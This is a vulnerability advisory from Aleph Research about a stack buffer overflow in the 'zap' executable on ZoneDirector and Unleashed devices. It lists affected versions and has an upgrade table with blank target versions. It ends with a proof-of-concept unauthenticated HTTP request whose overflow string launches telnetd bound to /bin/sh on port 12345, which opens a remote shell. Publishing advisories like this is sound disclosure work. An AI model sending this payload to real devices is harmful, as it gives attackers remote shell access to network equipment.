Stack buffer overflow in zap executable

Aleph Research Advisory





  • ZoneDirector
  • Unleashed

Vulnerable Version

  • ZoneDirector: 9.9 and before
  • ZoneDirector: 9.10.x
  • ZoneDirector: 9.12.x
  • ZoneDirector: 9.13.x
  • ZoneDirector: 10.0.x
  • ZoneDirector: 10.1.x
  • ZoneDirector: 10.2.x
  • ZoneDirector: 10.3.x
  • Unleashed: 200.6 and before
  • Unleashed: 200.7


  • 9.10.x: Upgrade to
  • 9.12.x: Upgrade to
  • 9.13.x: Upgrade to
  • 10.0.x: Upgrade to
  • 10.1.x: Upgrade to
  • 10.2.x: Upgrade to
  • 10.3.x: Upgrade to
  • 200.6 and before: Upgrade to
  • 200.7: Upgrade to

Technical Details

Stack buffer overflow/remote code execution vulnerability via a crafted unauthenticated HTTP request

zap executable contains unsafe strnpy() on its “-D” argument parser. It can be used to overflow the stack and run arbitrary code. Unintended arguments can be passed to zap by using CVE-2019-19836.

Information about the exploitation of the vulnerability can be found in our blog post or the 36C3 talk.

Proof Of Concept

Stack buffer overflow on zap executable using unauthenticated jaxa request:

POST /tools/_cmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded charset=UTF-8
Content-Length: 473

<ajax-request action='docmd' xcmd='wc' updater='system.1568118269965.3208' comp='zapd'>
<xcmd cmd='wc' comp='zapd' wcid=1 client='' tool='zap-up' zap-type='udp' server=' -D/tmp/Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0A2p������p���5Ad6$r��d8Ad9Ae0Ae1A3Ae4Ae5Ae6A,e7AeCCCCDDDD������������f5Af6Af7,CCCC,telnetd,-l/bin/sh,-p12345' syspmtu=65500 />




External References